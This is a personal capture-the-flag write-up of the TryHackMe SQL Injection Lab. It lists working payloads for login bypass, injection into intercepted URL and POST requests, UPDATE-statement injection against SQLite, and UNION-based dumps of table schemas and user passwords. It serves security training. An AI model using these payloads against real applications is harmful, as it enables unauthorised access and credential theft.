Buy me a tea

TryHackMe - SQL Injection Lab

SQL Injection lab

Introduction to SQL Injection: Part 1

SQL Injection 1: Input Box Non-String

We have a login page. We need to bypass login This payload worked 1 or 1=1; -- bypass login

SQL Injection 2: Input Box String

The payload that worked was 1' or 1=1; --

SQL Injection 2

SQL Injection 3: URL Injection

For this one to work, we need to intercept the request (there is a client side check that block from putting special char) So first we put legit chars and then we modify our request live. This payload works 1' or 1=1; --

  • Initial request

  • Edited request

SQL Injection 4: POST Injection

We need to process the same and intercept the traffic. This payload 1' or 1=1; -- worked (it has to be url encoded)

  • Original request

  • Edited request

Introduction to SQL Injection: Part 2

SQL Injection 5: UPDATE Statement

We need to login with the creds 10:toor Then we have to access to "Edit Profile" The injection seems to work in the email field and when we using ',nickName=sqlite_version(),email=' it seems to be sqlite.

sqlite

With this payload we get this ',nickName=(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'),email='

list tables

Let's try to see what is in secrets

',nickName=(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='secrets'),email='

create table

',nickName=(SELECT group_concat(id || "," || author || "," || secret || ":") from secrets),email='

And we get the flag!

Vulnerable Startup: Broken Authentication

Here the payload that worked is admin' or 1=1 --

Vulnerable Startup: Broken Authentication 2

We can bypass login using the same payload as before.

I won't go in details here, you just need to follow the explaination in the task if you are stuck.

Note: the chall that I did not cover here can be done by refering to the task in case you are stuck on your own.

Vulnerable Startup: Book Title 1

Using the NULL method we can see that it needs 4 fields ') UNION SELECT NULL, NULL, NULL, NULL-- -

null

Using this payload we find the tables ') UNION SELECT group_concat(tbl_name), group_concat(tbl_name), group_concat(tbl_name), group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'-- -

get tables

Using this payload we get more information about the users table ') UNION SELECT sql, sql, sql, sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='users'-- -

users

Finally, using this payload we can get dump the users table and get the flag ') UNION SELECT id, username, password, id from users-- -

Vulnerable Startup: Book Title 2

The payload that worked here is this one title=' union select '1'' union select 1,2,3,password from users-- -

PreviousTryHackMe - SimpleCTFNextTryHackMe - Sudo Security Bypass

Last updated